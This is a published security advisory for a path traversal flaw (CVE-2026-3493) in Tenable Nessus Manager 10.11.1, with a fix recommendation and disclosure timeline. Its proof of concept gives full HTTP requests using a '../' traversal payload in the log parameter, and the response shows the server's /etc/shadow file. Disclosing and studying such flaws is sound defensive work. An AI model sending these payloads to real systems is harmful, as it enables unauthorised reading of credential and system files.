usd-2026-003 | Tenable Nessus Manager 10.11.1 - Path Traversal (CWE-35)

Product: Tenable Nessus Manager
Affected Version: 10.11.1
Vulnerability Type: Path Traversal (CWE-35)
Security Risk: High
Vendor: Tenable
Vendor URL: https://www.tenable.com/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2026-3493
CVE Link: https://www.cve.org/CVERecord?id=CVE-2026-3493
Advisory ID: usd-2026-003

Description

Tenable Nessus Manager is a vulnerability management platform designed to centrally coordinate vulnerability scanning. It provides a management layer for orchestrating scanners and administering Nessus Agents. Nessus Manager can remotely manage, update, and configure linked agents.
Once agents are linked, they receive scan instructions from the manager, perform assessments locally on the host system, and send results back to the manager.

Nessus Manager also provides functionality for retrieving logs from linked agents. Administrators can request agent logs, after which the agents push their log data back to the manager, where the collected logs can then be downloaded for analysis.

The log download mechanism contains a path traversal vulnerability that allows administrative users to navigate outside the intended directories and download arbitrary files from the managers underlying operating system.

Proof of Concept

The log parameter in the POST request to /agents/x/download-log can be exploited to access arbitrary files through path traversal, as illustrated in the sample request below:

POST /agents/4/download-log HTTP/1.1
Host: 192.168.213.133:8834
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
X-Cookie: token=187972135c67f529687c2490376cdc6989131f7d0655d362
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: [https://192.168.213.133:8834/]()
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
Content-Length: 58



{"log":"../../../../../../../../../../../../etc/shadow"}

The response contains a one-time token issued for this specific request.

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
X-Frame-Options: DENY
Content-Type: application/json
Connection: close
X-XSS-Protection: 1; mode=block
Server: NessusWWW
X-Content-Type-Options: nosniff
Date: Tue, 24 Feb 2026 13:44:28 GMT
Content-Length: 76
Content-Security-Policy: upgrade-insecure-requests; block-all-mixed-content; form-action 'self'; frame-ancestors 'none'; frame-src [https://store.tenable.com;]() default-src 'self'; connect-src 'self' data.nessus-telemetry.tenable.com content.nessus-telemetry.tenable.com www.tenable.com; script-src 'self' content.nessus-telemetry.tenable.com www.tenable.com; img-src 'self' data: content.nessus-telemetry.tenable.com data.nessus-telemetry.tenable.com; style-src 'self' www.tenable.com; object-src 'none'; base-uri 'self';
Strict-Transport-Security: max-age=31536000; includeSubDomains
Expires: 0
Expect-CT: max-age=0
Pragma: no-cache



{"token":"21c09c96065f900cfb1d6c2f3cf548a1950578fe55b3b7cfaa7a8b5581c80c14"}

The token can then be used to perform a one-time download via the following GET request:

GET /tokens/21c09c96065f900cfb1d6c2f3cf548a1950578fe55b3b7cfaa7a8b5581c80c14/download HTTP/1.1
Host: 192.168.213.133:8834
[...]

As a result, the content of the /etc/shadow file are displayed in the servers response:

HTTP/1.1 200 OK
Content-Disposition: attachment; filename="../../../../../../../../../../../../etc/shadow"
Cache-Control: no-cache, no-store, must-revalidate
X-Frame-Options: DENY
Content-Type: application/octet-stream
Connection: close
X-XSS-Protection: 1; mode=block
Server: NessusWWW
Date: Tue, 24 Feb 2026 13:44:35 GMT
X-Content-Type-Options: nosniff
Content-Security-Policy: upgrade-insecure-requests; block-all-mixed-content; form-action 'self'; frame-ancestors 'none'; frame-src [https://store.tenable.com;]() default-src 'self'; connect-src 'self' data.nessus-telemetry.tenable.com content.nessus-telemetry.tenable.com www.tenable.com; script-src 'self' content.nessus-telemetry.tenable.com www.tenable.com; img-src 'self' data: content.nessus-telemetry.tenable.com data.nessus-telemetry.tenable.com; style-src 'self' www.tenable.com; object-src 'none'; base-uri 'self';
Strict-Transport-Security: max-age=31536000; includeSubDomains
Expect-CT: max-age=0
Expires: 0
Pragma: no-cache
Content-Length: 833

root:!::0:99999:7:::
bin:*:19447:0:99999:7:::
daemon:*:19447:0:99999:7:::
adm:*:19447:0:99999:7:::
lp:*:19447:0:99999:7:::
sync:*:19447:0:99999:7:::
shutdown:*:19447:0:99999:7:::
halt:*:19447:0:99999:7:::
mail:*:19447:0:99999:7:::
operator:*:19447:0:99999:7:::
games:*:19447:0:99999:7:::
ftp:*:19447:0:99999:7:::
nobody:*:19447:0:99999:7:::
dbus:!!:20487::::::
systemd-coredump:!!:20487::::::
systemd-resolve:!!:20487::::::
tss:!!:20487::::::
polkitd:!!:20487::::::
clevis:!!:20487::::::
unbound:!!:20487::::::
sshd:!!:20487::::::
setroubleshoot:!!:20487::::::
cockpit-ws:!!:20487::::::
cockpit-wsinstance:!!:20487::::::
pcp:!!:20487::::::
sssd:!!:20487::::::
chrony:!!:20487::::::
tcpdump:!!:20487::::::
admin:$6$[REDACTED]:20487:0:99999:7:::

Fix

It is recommended to implement strict input validation and sanitization on the log parameter to prevent path traversal attacks. The application should restrict the parameter to a predefined set of valid log filenames or enforce resolution within a designated log directory. Input should be normalized to its canonical form, and any requests containing traversal sequences (e.g., ../) should be explicitly rejected.

References

Timeline

  • 2026-02-24: First contact request via Hackerone
  • 2026-02-25: Vulnerability confirmed as valid
  • 2026-03-03: Nessus Manager 10.10.3 and 10.11.3 released
  • 2026-03-30: Advisory published

Credits

This security vulnerability was identified by Ole Wagner of usd AG.